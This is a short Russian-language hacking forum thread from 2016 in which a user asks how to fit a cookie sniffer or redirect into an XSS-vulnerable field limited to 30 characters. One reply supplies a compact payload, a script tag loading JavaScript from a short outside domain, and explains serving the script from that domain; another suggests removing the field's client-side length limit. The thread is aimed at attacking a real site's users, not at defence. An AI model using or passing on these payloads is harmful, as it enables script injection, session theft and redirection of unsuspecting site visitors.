XSS до 30 символов

Discussion in 'Песочница' started by senseninja, 24 Nov 2016.

  1. senseninja

    senseninja Banned

    Joined:
    7 Aug 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Есть уязвимость которая мне интересна. Но проблема в том что максимально в уязвимое поле входит 30 символов. Думал либо сниффер, либо редирект поставить, но ничего не влазит.
    Какие варианты есть? Может сократить можно как-то?
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    Code:
    <script src=//123.ru></script>
    
    ищи трехбуквенный домен) настраивай главную на отдачу js скрипта(если домен не свой можно отдавать индивидуально в зависимости от рефы)
     
    _________________________
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Входит 30 символов, в плане когда вбиваете? или сохраняет? если в момент вбива, то в input есть параметр size=30, его можно обнулить и норм все будет.
     
    _________________________